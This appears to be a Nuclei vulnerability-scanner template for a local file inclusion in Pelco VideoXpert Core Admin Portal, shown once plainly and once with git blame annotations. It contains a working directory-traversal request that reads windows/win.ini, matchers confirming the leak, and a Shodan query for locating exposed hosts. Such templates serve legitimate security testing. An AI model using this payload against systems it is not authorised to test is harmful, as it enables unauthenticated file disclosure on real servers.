nuclei-templates/http/vulnerabilities/videoxpert-lfi.yaml

id: videoxpert-lfi

info:
  name: Schneider Electric Pelco VideoXpert Core Admin Portal - Local File Inclusion
  author: 0x_akoko
  severity: high
  description: Schneider Electric Pelco VideoXpert Core Admin Portal suffers from local file inclusion. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
  reference:
    - https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22Directory-Traversal.html
  metadata:
    shodan-query: title:"VideoXpert"
  tags: schneider,pelco,packetstorm,lfi,videoxpert

http:
  - method: GET
    path:
      - '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'bit app support'
          - 'fonts'
          - 'extensions'
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2023/01/15
Update and rename schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml to vulnerabilities/videoxpert-lfi.yaml 2022-09-12 08:33:36 +00:00			`id: videoxpert-lfi`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00
			`info:`
Dashboard Content Enhancements (#6526) Dashboard Content Enhancements 2023-01-16 17:41:15 +00:00			`name: Schneider Electric Pelco VideoXpert Core Admin Portal - Local File Inclusion`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00			`author: 0x_akoko`
			`severity: high`
Dashboard Content Enhancements (#6526) Dashboard Content Enhancements 2023-01-16 17:41:15 +00:00			`description: Schneider Electric Pelco VideoXpert Core Admin Portal suffers from local file inclusion. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.`
Update and rename schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml to vulnerabilities/videoxpert-lfi.yaml 2022-09-12 08:33:36 +00:00			`reference:`
			`- https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html`
			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php`
Dashboard Content Enhancements (#6526) Dashboard Content Enhancements 2023-01-16 17:41:15 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22Directory-Traversal.html`
Update and rename schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml to vulnerabilities/videoxpert-lfi.yaml 2022-09-12 08:33:36 +00:00			`metadata:`
			`shodan-query: title:"VideoXpert"`
Auto Generated CVE annotations [Mon Sep 12 11:34:28 UTC 2022] :robot: 2022-09-12 11:34:28 +00:00			`tags: schneider,pelco,packetstorm,lfi,videoxpert`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00			`- method: GET`
			`path:`
Update schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-12 08:28:44 +00:00			`- '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00
Update videoxpert-lfi.yaml 2022-09-12 09:50:52 +00:00			`matchers-condition: and`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00			`matchers:`
			`- type: word`
Update videoxpert-lfi.yaml 2022-09-12 09:50:52 +00:00			`part: body`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00			`words:`
Update schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-12 08:28:44 +00:00			`- 'bit app support'`
			`- 'fonts'`
			`- 'extensions'`
Create schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml 2022-09-10 10:33:14 +00:00			`condition: and`
Update videoxpert-lfi.yaml 2022-09-12 09:50:52 +00:00
			`- type: status`
			`status:`
			`- 200`
Dashboard Content Enhancements (#6526) Dashboard Content Enhancements 2023-01-16 17:41:15 +00:00
			`# Enhanced by mp on 2023/01/15`